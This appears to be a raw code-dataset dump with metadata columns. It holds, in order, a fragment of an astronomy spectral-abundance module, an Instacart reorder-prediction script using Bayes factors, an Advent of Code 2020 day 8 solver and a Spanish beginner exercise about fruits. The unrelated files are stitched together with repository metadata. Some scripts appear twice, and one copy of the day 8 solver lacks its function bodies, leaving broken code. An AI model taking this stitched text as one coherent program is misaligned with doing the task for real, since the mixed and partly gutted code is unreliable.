            "[X/H]","e_XH","s_X"] + ["[X/Fe1]","e_XFe1","[X/Fe2]","e_XFe2","[X/Fe]","e_XFe"]
    assert len(cols)==len(summary_tab.colnames)
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for species in ul_species:
        # Species with an actual detection keep their measured summary row
        if species in summary_tab["species"]: continue
        ttab_ul = tab_ul[tab_ul["species"]==species]
        elem = species_to_element(species)
        N = len(ttab_ul)
        # Most stringent (lowest) limit among this species' lines
        limit_logeps = np.min(ttab_ul["logeps"])
        limit_XH = limit_logeps - solar_composition(species)
        limit_XFe1 = limit_XH - feh1
        limit_XFe2 = limit_XH - feh2
        # Ionized species (fractional part, e.g. 26.1) use Fe II, neutrals Fe I
        limit_XFe = limit_XFe2 if (species - int(species) > .01) else limit_XFe1
        input_data = [species, elem, N,
                      limit_logeps, np.nan, np.nan,
                      limit_logeps, np.nan, np.nan,
                      np.nan, np.nan, np.nan, np.nan, np.nan,
                      np.nan, np.nan, np.nan, np.nan, np.nan,
                      limit_XH, np.nan, np.nan, limit_XFe1, np.nan, limit_XFe2, np.nan,
                      limit_XFe, np.nan
        ]
        for col, x in zip(cols, input_data):
            data[col].append(x)
    summary_tab_ul = astropy.table.Table(data)
    if len(summary_tab_ul) > 0:
        if len(summary_tab) > 0:
            summary_tab = astropy.table.vstack([summary_tab, summary_tab_ul])
        else:
            summary_tab = summary_tab_ul
    return tab, summary_tab
def process_session_uncertainties(session,
                                  rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
    """
    After session.compute_all_abundance_uncertainties() has been run, pull
    out the per-line data and compute the final abundance table and errors.

    By default the stellar parameters are treated as uncorrelated; pass
    rho_XY (with X, Y in [T, g, v, M]) to include correlated errors.

    Returns (line_table, summary_table).
    """
    # Correlation matrix in the order [T, g, v, M]; downstream code
    # multiplies it by the individual errors to form the covariance matrix.
    rho_matrix = _make_rhomat(rho_Tg, rho_Tv, rho_TM, rho_gv, rho_gM, rho_vM)
    # Per-line measurement table (upper limits are not included yet)
    line_tab = process_session_uncertainties_lines(session, rho_matrix)
    # Per-species abundance summary
    species_tab = process_session_uncertainties_abundancesummary(line_tab, rho_matrix)
    # Fold the upper limits into both tables; returns (tab, summary_tab)
    return process_session_uncertainties_limits(session, line_tab, species_tab, rho_matrix)
def get_synth_eqw(model, window=1.0, wavelength=None,
                  get_spec=False):
    """
    Calculate the equivalent width associated with the synthetic line.
    This is done by synthesizing the line in absence of any other elements,
    then integrating the synthetic spectrum in a window around the central wavelength.
    The user can specify the size of the window (default +/-1A)
    and the central wavelength (default None -> model.wavelength)

    Returns (eqw, eqw_all, blank_eqw, blank_eqw_all) in milliangstroms:
    the windowed and full-range equivalent widths of the element's synthesis
    and of a "blank" synthesis with every element suppressed (-9.0).
    If get_spec is True, additionally returns the element synthesis
    (dispersion, intensities).
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    assert isinstance(model, SpectralSynthesisModel)
    assert len(model.elements)==1, model.elements
    # Suppress every element except the one this model fits
    abundances = model.metadata["rt_abundances"].copy()
    for key in abundances:
        if key != model.elements[0]: abundances[key] = -9.0
    # Fix: dict.values() is a non-indexable view on Python 3; materialize it
    # before taking the first (fitted) abundance.
    abundances[model.elements[0]] = list(model.metadata["fitted_result"][0].values())[0]
    print(abundances)
    synth_dispersion, intensities, meta = model.session.rt.synthesize(
        model.session.stellar_photosphere, model.transitions,
        abundances,
        isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
    if wavelength is None: wavelength = model.wavelength
    ii = (synth_dispersion > wavelength - window) & (synth_dispersion < wavelength + window)
    # integrate with the trapezoid rule, get milliangstroms
    eqw = 1000.*integrate.trapz(1.0-intensities[ii], synth_dispersion[ii])
    # integrate everything with the trapezoid rule, get milliangstroms
    eqw_all = 1000.*integrate.trapz(1.0-intensities, synth_dispersion)
    # Second synthesis with *all* elements suppressed: the blend-free baseline
    for key in abundances:
        abundances[key] = -9.0
    blank_dispersion, blank_flux, blank_meta = model.session.rt.synthesize(
        model.session.stellar_photosphere, model.transitions,
        abundances,
        isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
    # NOTE: reuses the window mask `ii` from the first synthesis — assumes
    # both syntheses share the same dispersion grid; TODO confirm.
    blank_eqw = 1000.*integrate.trapz(1.0-blank_flux[ii], blank_dispersion[ii])
    # integrate everything with the trapezoid rule, get milliangstroms
    blank_eqw_all = 1000.*integrate.trapz(1.0-blank_flux, blank_dispersion)
    if get_spec:
        return eqw, eqw_all, blank_eqw, blank_eqw_all, synth_dispersion, intensities
    return eqw, eqw_all, blank_eqw, blank_eqw_all
| 9,557 | 0 | 307 |
b29384389eba26985454f182e28e8d39d6a7b891 | 11,406 | py | Python | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | InstaCartBasketModel.py | ratdee/god | 3349447ca3a418e94cc53a926c09f091e1720ce6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 16:04:58 2019
@author: Admin
"""
# -*- coding: utf-8 -*-
"""
Created on Mon July 8 17:30:45 2019
@author: Admin
"""
import pandas as pd
import numpy as np
# reading data
order_products_prior_df = pd.read_csv('order_products_prior.csv', dtype={
'order_id': np.int32,
'product_id': np.int32,
'add_to_cart_order': np.int16,
'reordered': np.int8})
print('Loaded prior orders')
print('shape of Ordersproduct priors',order_products_prior_df.shape)
order_products_prior_df=order_products_prior_df.loc[order_products_prior_df['order_id']<=2110720]
print('Loading orders')
orders_df = pd.read_csv( 'orders.csv', dtype={
'order_id': np.int32,
'user_id': np.int32,
'eval_set': 'category',
'order_number': np.int16,
'order_dow': np.int8,
'order_hour_of_day': np.int8,
'days_since_prior_order': np.float32})
orders_df=orders_df.loc[orders_df['order_id']<=2110720]
print(orders_df.shape)
print('Loading aisles info')
aisles = pd.read_csv('products.csv', engine='c',
usecols = ['product_id','aisle_id'],
dtype={'product_id': np.int32, 'aisle_id': np.int32})
pd.set_option('display.float_format', lambda x: '%.3f' % x)
print("\n Checking the loaded CSVs")
print("Prior orders:", order_products_prior_df.shape)
print("Orders", orders_df.shape)
print("Aisles:", aisles.shape)
test = orders_df[orders_df['eval_set'] == 'test' ]
user_ids = test['user_id'].values
orders_df = orders_df[orders_df['user_id'].isin(user_ids)]
print('test shape', test.shape)
print(orders_df.shape)
prior = pd.DataFrame(order_products_prior_df.groupby('product_id')['reordered'] \
.agg([('number_of_orders',len),('sum_of_reorders','sum')]))
print(prior.head())
prior['prior_p'] = (prior['sum_of_reorders']+1)/(prior['number_of_orders']+2) # Informed Prior
print(prior.head())
print('Here is The Prior: our first guess of how probable it is that a product be reordered once it has been ordered.')
#print(prior.head())
# merge everything into one dataframe and save any memory space
combined_features = pd.DataFrame()
combined_features = pd.merge(order_products_prior_df, orders_df, on='order_id', how='right')
# slim down comb -
combined_features.drop(['eval_set','order_dow','order_hour_of_day'], axis=1, inplace=True)
del order_products_prior_df
del orders_df
combined_features = pd.merge(combined_features, aisles, on ='product_id', how = 'left')
del aisles
prior.reset_index(inplace = True)
combined_features = pd.merge(combined_features, prior, on ='product_id', how = 'left')
del prior
#print(combined_features.head())
recount = pd.DataFrame()
recount['reorder_c'] = combined_features.groupby(combined_features.order_id)['reordered'].sum().fillna(0)
#print(recount.head(20))
print('classification')
bins = [-0.1, 0, 2,4,6,8,11,14,19,71]
cat = ['None','<=2','<=4','<=6','<=8','<=11','<=14','<=19','>19']
recount['reorder_b'] = pd.cut(recount['reorder_c'], bins, labels = cat)
recount.reset_index(inplace = True)
#print(recount.head(20))
#We discretize reorder count into categories, 9 buckets, being sure to include 0 as bucket. These bins maximize mutual information with ['reordered'].
combined_features = pd.merge(combined_features, recount, how = 'left', on = 'order_id')
del recount
#print(combined_features.head(50))
bins = [0,2,3,5,7,9,12,17,80]
cat = ['<=2','<=3','<=5','<=7','<=9','<=12','<=17','>17']
combined_features['atco1'] = pd.cut(combined_features['add_to_cart_order'], bins, labels = cat)
del combined_features['add_to_cart_order']
#print(combined_features.head(50))
combined_features.to_csv('combined_features.csv', index=False)
atco_fac = pd.DataFrame()
atco_fac = combined_features.groupby(['reordered', 'atco1'])['atco1'].agg(np.count_nonzero).unstack('atco1')
#print(atco_fac.head(10))
tot = np.sum(atco_fac,axis=1)
print(tot.head(10))
atco_fac = atco_fac.iloc[:,:].div(tot, axis=0)
#print(atco_fac.head(10))
atco_fac = atco_fac.stack('atco1')
#print(atco_fac.head(20))
atco_fac = pd.DataFrame(atco_fac)
atco_fac.reset_index(inplace = True)
atco_fac.rename(columns = {0:'atco_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, atco_fac, how='left', on=('reordered', 'atco1'))
combined_features.head(50)
aisle_fac = pd.DataFrame()
aisle_fac = combined_features.groupby(['reordered', 'atco1', 'aisle_id'])['aisle_id']\
.agg(np.count_nonzero).unstack('aisle_id')
print(aisle_fac.head(30))
#print(aisle_fac.head(30))
tot = np.sum(aisle_fac,axis=1)
print(tot.head(20))
aisle_fac = aisle_fac.iloc[:,:].div(tot, axis=0)
print(aisle_fac.head(20))
print('Stacking Aisle Fac')
aisle_fac = aisle_fac.stack('aisle_id')
print(aisle_fac.head(20))
aisle_fac = pd.DataFrame(aisle_fac)
aisle_fac.reset_index(inplace = True)
aisle_fac.rename(columns = {0:'aisle_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, aisle_fac, how = 'left', on = ('aisle_id','reordered','atco1'))
recount_fac = pd.DataFrame()
recount_fac = combined_features.groupby(['reordered', 'atco1', 'reorder_b'])['reorder_b']\
.agg(np.count_nonzero).unstack('reorder_b')
print(recount_fac.head(20))
tot = pd.DataFrame()
tot = np.sum(recount_fac,axis=1)
print(tot.head(20))
recount_fac = recount_fac.iloc[:,:].div(tot, axis=0)
print(recount_fac.head(20))
#print('after stacking***************************')
recount_fac.stack('reorder_b')
print(recount_fac.head(20))
recount_fac = pd.DataFrame(recount_fac.unstack('reordered').unstack('atco1')).reset_index()
#print(recount_fac.head(20))
recount_fac.rename(columns = {0:'recount_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, recount_fac, how = 'left', on = ('reorder_b', 'reordered', 'atco1'))
print(recount_fac.head(50))
print(combined_features.head(20))
p = pd.DataFrame()
p = (combined_features.loc[:,'atco_fac_p'] * combined_features.loc[:,'aisle_fac_p'] * combined_features.loc[:,'recount_fac_p'])
p.reset_index()
combined_features['p'] = p
print(combined_features.head(30))
comb0 = pd.DataFrame()
print(combined_features.shape)
comb0 = combined_features[combined_features['reordered']==0]
print(comb0.shape)
comb0.loc[:,'first_order'] = comb0['order_number']
# now every product that was ordered has a posterior in usr.
comb0.loc[:,'beta'] = 1
comb0.loc[:,'bf'] = (comb0.loc[:,'prior_p'] * comb0.loc[:,'p']/(1 - comb0.loc[:,'p'])) # bf1
# Small 'slight of hand' here. comb0.bf is really the first posterior and second prior.
#comb0.to_csv('comb0.csv', index=False)
# Calculate beta and BF1 for the reordered products
comb1 = pd.DataFrame()
comb1 = combined_features[combined_features['reordered']==1]
comb1.loc[:,'beta'] = (1 - .05*comb1.loc[:,'days_since_prior_order']/30)
comb1.loc[:,'bf'] = (1 - comb1.loc[:,'p'])/comb1.loc[:,'p'] # bf0
comb_last = pd.DataFrame()
comb_last = pd.concat([comb0, comb1], axis=0).reset_index(drop=True)
comb_last = comb_last[['reordered', 'user_id', 'order_id', 'product_id','reorder_c','order_number',
'bf','beta','atco_fac_p', 'aisle_fac_p', 'recount_fac_p']]
comb_last = comb_last.sort_values((['user_id', 'order_number', 'bf']))
pd.set_option('display.float_format', lambda x: '%.6f' % x)
comb_last.head()
first_order = pd.DataFrame()
first_order = comb_last[comb_last.reordered == 0]
first_order.rename(columns = {'order_number':'first_o'}, inplace = True)
first_order.to_csv('first_order_before_transform.csv', index=False)
first_order.loc[:,'last_o'] = comb_last.groupby(['user_id'])['order_number'].transform(max)
first_order.to_csv('first_order_transform.csv', index=False)
first_order = first_order[['user_id','product_id','first_o','last_o']]
comb_last = pd.merge(comb_last, first_order, on = ('user_id', 'product_id'), how = 'left')
comb_last.head()
comb_last.to_csv('comb_last.csv')
comb_last = pd.read_csv('comb_last.csv', index_col=0)
#comb_last.to_csv('comb_last.csv', index=False)
temp = pd.pivot_table(comb_last[(comb_last.user_id == 786
) & (comb_last.first_o == comb_last.order_number)],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
#print (temp.head(10))
temp = temp.fillna(method='pad', axis=1).fillna(1)
temp.head(10)
temp.to_csv('temp.csv')
#print(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
# values = 'bf', index = ['user_id', 'product_id'],
# columns = 'order_number').head(10))
temp.update(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
print(temp.head(10))
#temp.to_csv('temp.csv')
import logging
logging.basicConfig(filename='bayes.log',level=logging.DEBUG)
logging.debug("Started Posterior calculations")
print("Started Posterior calculations")
## Bayesian posterior per user: combine each product's Bayes factors across
## that user's orders and keep the 10 products with the highest posterior.
# Fix: DataFrame.append was removed in pandas 2.0 and repeated appends are
# quadratic anyway — collect per-user frames and concatenate once at the end.
user_frames = []
for uid in comb_last.user_id.unique():
    if uid % 1000 == 0:
        print("Posterior calculated until user %d" % uid)
        logging.debug("Posterior calculated until user %d" % uid)
    comb_last_temp = comb_last[comb_last['user_id'] == uid].reset_index()
    # One column per order number; rows are (user, product) pairs, seeded at
    # the order where the product first appears.
    com = pd.pivot_table(comb_last_temp[comb_last_temp.first_o == comb_last_temp.order_number],
                         values = 'bf', index = ['user_id', 'product_id'],
                         columns = 'order_number', dropna=False)
    # Forward-fill across orders, then default Bayes factor of 1
    # (fillna(method='pad') is deprecated; ffill is the modern spelling).
    com = com.ffill(axis=1).fillna(1)
    com.update(pd.pivot_table(comb_last_temp[comb_last_temp.first_o <= comb_last_temp.order_number],
                              values = 'bf', index = ['user_id', 'product_id'],
                              columns = 'order_number'))
    com.reset_index(inplace=True)
    # NOTE(review): after reset_index the row product also multiplies the
    # user_id/product_id columns into 'posterior' — confirm this is intended.
    com['posterior'] = com.product(axis=1)
    user_frames.append(com.sort_values(by=['posterior'], ascending=False).head(10)
                          .groupby('user_id')['product_id'].apply(list).reset_index())
if user_frames:
    pred = pd.concat(user_frames, ignore_index=True)
else:
    pred = pd.DataFrame(columns=['user_id', 'product_id'])
print("Posterior calculated for all users")
logging.debug("Posterior calculated for all users")
pred = pred.rename(columns={'product_id': 'products'})
print(pred.head())
pred.to_csv('Finalpredictions.csv', index=False)
pred = pred.merge(test, on='user_id', how='left')[['order_id', 'products']]
pred['products'] = pred['products'].apply(lambda x: [int(i) for i in x]) \
.astype(str).apply(lambda x: x.strip('[]').replace(',', ''))
print(pred.head())
pred.to_csv('Testpredictions.csv', index=False) | 31.421488 | 151 | 0.65299 | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 16:04:58 2019
@author: Admin
"""
# -*- coding: utf-8 -*-
"""
Created on Mon July 8 17:30:45 2019
@author: Admin
"""
import pandas as pd
import numpy as np
# reading data
order_products_prior_df = pd.read_csv('order_products_prior.csv', dtype={
'order_id': np.int32,
'product_id': np.int32,
'add_to_cart_order': np.int16,
'reordered': np.int8})
print('Loaded prior orders')
print('shape of Ordersproduct priors',order_products_prior_df.shape)
order_products_prior_df=order_products_prior_df.loc[order_products_prior_df['order_id']<=2110720]
print('Loading orders')
orders_df = pd.read_csv( 'orders.csv', dtype={
'order_id': np.int32,
'user_id': np.int32,
'eval_set': 'category',
'order_number': np.int16,
'order_dow': np.int8,
'order_hour_of_day': np.int8,
'days_since_prior_order': np.float32})
orders_df=orders_df.loc[orders_df['order_id']<=2110720]
print(orders_df.shape)
print('Loading aisles info')
aisles = pd.read_csv('products.csv', engine='c',
usecols = ['product_id','aisle_id'],
dtype={'product_id': np.int32, 'aisle_id': np.int32})
pd.set_option('display.float_format', lambda x: '%.3f' % x)
print("\n Checking the loaded CSVs")
print("Prior orders:", order_products_prior_df.shape)
print("Orders", orders_df.shape)
print("Aisles:", aisles.shape)
test = orders_df[orders_df['eval_set'] == 'test' ]
user_ids = test['user_id'].values
orders_df = orders_df[orders_df['user_id'].isin(user_ids)]
print('test shape', test.shape)
print(orders_df.shape)
prior = pd.DataFrame(order_products_prior_df.groupby('product_id')['reordered'] \
.agg([('number_of_orders',len),('sum_of_reorders','sum')]))
print(prior.head())
prior['prior_p'] = (prior['sum_of_reorders']+1)/(prior['number_of_orders']+2) # Informed Prior
print(prior.head())
print('Here is The Prior: our first guess of how probable it is that a product be reordered once it has been ordered.')
#print(prior.head())
# merge everything into one dataframe and save any memory space
combined_features = pd.DataFrame()
combined_features = pd.merge(order_products_prior_df, orders_df, on='order_id', how='right')
# slim down comb -
combined_features.drop(['eval_set','order_dow','order_hour_of_day'], axis=1, inplace=True)
del order_products_prior_df
del orders_df
combined_features = pd.merge(combined_features, aisles, on ='product_id', how = 'left')
del aisles
prior.reset_index(inplace = True)
combined_features = pd.merge(combined_features, prior, on ='product_id', how = 'left')
del prior
#print(combined_features.head())
recount = pd.DataFrame()
recount['reorder_c'] = combined_features.groupby(combined_features.order_id)['reordered'].sum().fillna(0)
#print(recount.head(20))
print('classification')
bins = [-0.1, 0, 2,4,6,8,11,14,19,71]
cat = ['None','<=2','<=4','<=6','<=8','<=11','<=14','<=19','>19']
recount['reorder_b'] = pd.cut(recount['reorder_c'], bins, labels = cat)
recount.reset_index(inplace = True)
#print(recount.head(20))
#We discretize reorder count into categories, 9 buckets, being sure to include 0 as bucket. These bins maximize mutual information with ['reordered'].
combined_features = pd.merge(combined_features, recount, how = 'left', on = 'order_id')
del recount
#print(combined_features.head(50))
bins = [0,2,3,5,7,9,12,17,80]
cat = ['<=2','<=3','<=5','<=7','<=9','<=12','<=17','>17']
combined_features['atco1'] = pd.cut(combined_features['add_to_cart_order'], bins, labels = cat)
del combined_features['add_to_cart_order']
#print(combined_features.head(50))
combined_features.to_csv('combined_features.csv', index=False)
atco_fac = pd.DataFrame()
atco_fac = combined_features.groupby(['reordered', 'atco1'])['atco1'].agg(np.count_nonzero).unstack('atco1')
#print(atco_fac.head(10))
tot = np.sum(atco_fac,axis=1)
print(tot.head(10))
atco_fac = atco_fac.iloc[:,:].div(tot, axis=0)
#print(atco_fac.head(10))
atco_fac = atco_fac.stack('atco1')
#print(atco_fac.head(20))
atco_fac = pd.DataFrame(atco_fac)
atco_fac.reset_index(inplace = True)
atco_fac.rename(columns = {0:'atco_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, atco_fac, how='left', on=('reordered', 'atco1'))
combined_features.head(50)
aisle_fac = pd.DataFrame()
aisle_fac = combined_features.groupby(['reordered', 'atco1', 'aisle_id'])['aisle_id']\
.agg(np.count_nonzero).unstack('aisle_id')
print(aisle_fac.head(30))
#print(aisle_fac.head(30))
tot = np.sum(aisle_fac,axis=1)
print(tot.head(20))
aisle_fac = aisle_fac.iloc[:,:].div(tot, axis=0)
print(aisle_fac.head(20))
print('Stacking Aisle Fac')
aisle_fac = aisle_fac.stack('aisle_id')
print(aisle_fac.head(20))
aisle_fac = pd.DataFrame(aisle_fac)
aisle_fac.reset_index(inplace = True)
aisle_fac.rename(columns = {0:'aisle_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, aisle_fac, how = 'left', on = ('aisle_id','reordered','atco1'))
recount_fac = pd.DataFrame()
recount_fac = combined_features.groupby(['reordered', 'atco1', 'reorder_b'])['reorder_b']\
.agg(np.count_nonzero).unstack('reorder_b')
print(recount_fac.head(20))
tot = pd.DataFrame()
tot = np.sum(recount_fac,axis=1)
print(tot.head(20))
recount_fac = recount_fac.iloc[:,:].div(tot, axis=0)
print(recount_fac.head(20))
#print('after stacking***************************')
recount_fac.stack('reorder_b')
print(recount_fac.head(20))
recount_fac = pd.DataFrame(recount_fac.unstack('reordered').unstack('atco1')).reset_index()
#print(recount_fac.head(20))
recount_fac.rename(columns = {0:'recount_fac_p'}, inplace = True)
combined_features = pd.merge(combined_features, recount_fac, how = 'left', on = ('reorder_b', 'reordered', 'atco1'))
print(recount_fac.head(50))
print(combined_features.head(20))
p = pd.DataFrame()
p = (combined_features.loc[:,'atco_fac_p'] * combined_features.loc[:,'aisle_fac_p'] * combined_features.loc[:,'recount_fac_p'])
p.reset_index()
combined_features['p'] = p
print(combined_features.head(30))
comb0 = pd.DataFrame()
print(combined_features.shape)
comb0 = combined_features[combined_features['reordered']==0]
print(comb0.shape)
comb0.loc[:,'first_order'] = comb0['order_number']
# now every product that was ordered has a posterior in usr.
comb0.loc[:,'beta'] = 1
comb0.loc[:,'bf'] = (comb0.loc[:,'prior_p'] * comb0.loc[:,'p']/(1 - comb0.loc[:,'p'])) # bf1
# Small 'slight of hand' here. comb0.bf is really the first posterior and second prior.
#comb0.to_csv('comb0.csv', index=False)
# Calculate beta and BF1 for the reordered products
comb1 = pd.DataFrame()
comb1 = combined_features[combined_features['reordered']==1]
comb1.loc[:,'beta'] = (1 - .05*comb1.loc[:,'days_since_prior_order']/30)
comb1.loc[:,'bf'] = (1 - comb1.loc[:,'p'])/comb1.loc[:,'p'] # bf0
comb_last = pd.DataFrame()
comb_last = pd.concat([comb0, comb1], axis=0).reset_index(drop=True)
comb_last = comb_last[['reordered', 'user_id', 'order_id', 'product_id','reorder_c','order_number',
'bf','beta','atco_fac_p', 'aisle_fac_p', 'recount_fac_p']]
comb_last = comb_last.sort_values((['user_id', 'order_number', 'bf']))
pd.set_option('display.float_format', lambda x: '%.6f' % x)
comb_last.head()
first_order = pd.DataFrame()
first_order = comb_last[comb_last.reordered == 0]
first_order.rename(columns = {'order_number':'first_o'}, inplace = True)
first_order.to_csv('first_order_before_transform.csv', index=False)
first_order.loc[:,'last_o'] = comb_last.groupby(['user_id'])['order_number'].transform(max)
first_order.to_csv('first_order_transform.csv', index=False)
first_order = first_order[['user_id','product_id','first_o','last_o']]
comb_last = pd.merge(comb_last, first_order, on = ('user_id', 'product_id'), how = 'left')
comb_last.head()
comb_last.to_csv('comb_last.csv')
comb_last = pd.read_csv('comb_last.csv', index_col=0)
#comb_last.to_csv('comb_last.csv', index=False)
temp = pd.pivot_table(comb_last[(comb_last.user_id == 786
) & (comb_last.first_o == comb_last.order_number)],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number', dropna=False)
#print (temp.head(10))
temp = temp.fillna(method='pad', axis=1).fillna(1)
temp.head(10)
temp.to_csv('temp.csv')
#print(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
# values = 'bf', index = ['user_id', 'product_id'],
# columns = 'order_number').head(10))
temp.update(pd.pivot_table(comb_last[comb_last.first_o <= comb_last.order_number],
values = 'bf', index = ['user_id', 'product_id'],
columns = 'order_number'))
print(temp.head(10))
#temp.to_csv('temp.csv')
import logging
logging.basicConfig(filename='bayes.log',level=logging.DEBUG)
logging.debug("Started Posterior calculations")
print("Started Posterior calculations")
## Bayesian posterior per user: combine each product's Bayes factors across
## that user's orders and keep the 10 products with the highest posterior.
# Fix: DataFrame.append was removed in pandas 2.0 and repeated appends are
# quadratic anyway — collect per-user frames and concatenate once at the end.
user_frames = []
for uid in comb_last.user_id.unique():
    if uid % 1000 == 0:
        print("Posterior calculated until user %d" % uid)
        logging.debug("Posterior calculated until user %d" % uid)
    comb_last_temp = comb_last[comb_last['user_id'] == uid].reset_index()
    # One column per order number; rows are (user, product) pairs, seeded at
    # the order where the product first appears.
    com = pd.pivot_table(comb_last_temp[comb_last_temp.first_o == comb_last_temp.order_number],
                         values = 'bf', index = ['user_id', 'product_id'],
                         columns = 'order_number', dropna=False)
    # Forward-fill across orders, then default Bayes factor of 1
    # (fillna(method='pad') is deprecated; ffill is the modern spelling).
    com = com.ffill(axis=1).fillna(1)
    com.update(pd.pivot_table(comb_last_temp[comb_last_temp.first_o <= comb_last_temp.order_number],
                              values = 'bf', index = ['user_id', 'product_id'],
                              columns = 'order_number'))
    com.reset_index(inplace=True)
    # NOTE(review): after reset_index the row product also multiplies the
    # user_id/product_id columns into 'posterior' — confirm this is intended.
    com['posterior'] = com.product(axis=1)
    user_frames.append(com.sort_values(by=['posterior'], ascending=False).head(10)
                          .groupby('user_id')['product_id'].apply(list).reset_index())
if user_frames:
    pred = pd.concat(user_frames, ignore_index=True)
else:
    pred = pd.DataFrame(columns=['user_id', 'product_id'])
print("Posterior calculated for all users")
logging.debug("Posterior calculated for all users")
pred = pred.rename(columns={'product_id': 'products'})
print(pred.head())
pred.to_csv('Finalpredictions.csv', index=False)
pred = pred.merge(test, on='user_id', how='left')[['order_id', 'products']]
pred['products'] = pred['products'].apply(lambda x: [int(i) for i in x]) \
.astype(str).apply(lambda x: x.strip('[]').replace(',', ''))
print(pred.head())
pred.to_csv('Testpredictions.csv', index=False) | 0 | 0 | 0 |
7fd92d07a2e0b82f1ab5b3fd18e39426450f7bfc | 2,152 | py | Python | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | week2/day8.py | shaunnorris/aoc2020 | 694b83ba26e0c43b4839affc90e4cfab3debbd07 | [
"MIT"
] | null | null | null | import copy
testfile = "day8_test_input.txt"
testdata = load_input_file(testfile)
todaylist = load_input_file("day8input.txt")
part1 = run_commands(todaylist)[0]
print("part1:", part1)
part2 = alter_commands(todaylist)
print("part2:", part2)
| 27.240506 | 75 | 0.574349 | import copy
testfile = "day8_test_input.txt"  # sample program used by the test_* functions below
def test_load_input_file():
    # The sample program in day8_test_input.txt has 9 instructions.
    assert len(load_input_file(testfile)) == 9
def load_input_file(target):
    """Read *target* and return one [opcode, argument] pair per line.

    Each line is stripped of surrounding whitespace and split on a single
    space, e.g. "acc +1" -> ["acc", "+1"].
    """
    with open(target) as handle:
        stripped_lines = [raw.strip() for raw in handle]
    return [entry.split(" ") for entry in stripped_lines]
testdata = load_input_file(testfile)  # parsed sample program shared by the tests
def test_run_commands():
    # AoC day 8 part 1 example: accumulator is 5 when the loop is first detected.
    assert run_commands(testdata) == (5, False)
def run_commands(cmdlist):
    """Execute the handheld boot code (AoC 2020 day 8).

    cmdlist is a list of [opcode, argument] pairs where opcode is
    "nop"/"acc"/"jmp" and argument is a signed integer string.

    Returns (accumulator, success):
    - success is True when the instruction pointer lands exactly one past
      the last instruction (normal termination);
    - success is False when an instruction is about to execute a second
      time (infinite loop), or — fixed here — when a jmp leaves the
      program entirely, where the original version would spin forever.
    """
    offset = 0
    accumulator = 0
    already_run = set()  # set: O(1) membership vs O(n) for the original list
    while True:
        if offset == len(cmdlist):
            # Pointer is exactly one past the end: normal termination.
            return accumulator, True
        if offset < 0 or offset > len(cmdlist) or offset in already_run:
            # Loop detected, or a jmp escaped the program bounds.
            return accumulator, False
        already_run.add(offset)
        command = cmdlist[offset][0]
        qty = int(cmdlist[offset][1])
        if command == "jmp":
            offset += qty
        else:
            # "acc" updates the accumulator; "nop" (and anything unknown)
            # just advances to the next instruction.
            if command == "acc":
                accumulator += qty
            offset += 1
def test_alter_commands():
    # AoC day 8 part 2 example: repairing the corrupted jmp yields accumulator 8.
    assert alter_commands(testdata) == 8
def alter_commands(cmdlist):
    """Repair the corrupted boot code by flipping one jmp<->nop.

    Tries every nop then every jmp instruction in turn; the first variant
    that terminates normally wins, and its accumulator value is returned.
    Returns None if no single swap fixes the program.
    """
    candidates = [idx for idx, instr in enumerate(cmdlist) if "nop" in instr]
    candidates += [idx for idx, instr in enumerate(cmdlist) if "jmp" in instr]
    swap = {"jmp": "nop", "nop": "jmp"}
    for idx in candidates:
        trial = copy.deepcopy(cmdlist)
        opcode = cmdlist[idx][0]
        if opcode in swap:
            trial[idx][0] = swap[opcode]
        acc, finished = run_commands(trial)
        if finished:
            print("successful run found by changing instruction at", idx)
            return acc
# Solve the real puzzle input.
todaylist = load_input_file("day8input.txt")
part1 = run_commands(todaylist)[0]  # accumulator just before the loop repeats
print("part1:", part1)
part2 = alter_commands(todaylist)  # accumulator after repairing the corrupted instruction
print("part2:", part2)
| 1,761 | 0 | 138 |
0d36937846c01413e0090a7643f6609fb8616a0a | 445 | py | Python | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 67 | 2017-09-11T05:06:12.000Z | 2022-02-14T04:44:04.000Z | Ago-Dic-2019/Luis Llanes/Practica1/ejercicio5-7.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | Frutas_favoritas = ["Mangos", "Manzanas", "Bananas"]
if("Mangos" in Frutas_favoritas):
print("La neta si me gustan mucho los Manguitos")
if("Cocos" in Frutas_favoritas):
print("En verdad me agradan los cocos")
if("Manzanas" in Frutas_favoritas):
print("Me gustan mucho las manzanas")
if("Kiwis" in Frutas_favoritas):
print("Comer kiwis esta chido")
